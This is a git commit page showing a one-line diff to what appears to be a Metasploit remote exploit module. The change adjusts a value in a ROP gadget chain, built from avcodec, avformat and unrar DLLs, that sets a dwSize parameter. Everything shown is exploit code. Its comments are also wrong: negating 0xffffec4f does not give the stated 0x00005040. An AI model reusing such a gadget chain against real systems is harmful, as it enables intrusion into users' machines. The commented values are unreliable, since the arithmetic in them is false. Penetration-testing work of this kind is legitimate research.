Fix the dwSize parameter

bug/bundler_fix
sgabe 2014-01-24 11:38:57 +01:00
parent 8f6dcd7545
commit 16b8b58a84
1 changed files with 1 additions and 1 deletions

View File

@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
0x6ad9d85d, # POP EBP # RETN [avcodec-52.dll]
0x10018fc3, # &CALL ESP [unrar.dll]
0x64984a70, # POP EAX # RETN [avformat-52.dll]
0xffffec4e, # Value to negate, will become 0x00005041
0xffffec4f, # Value to negate, will become 0x00005040
0x6b0ce791, # NEG EAX # RETN [avcodec-52.dll]
0x6b063c7d, # PUSH EAX # POP EBX # POP ESI # POP EDI # RETN [avcodec-52.dll]
junk,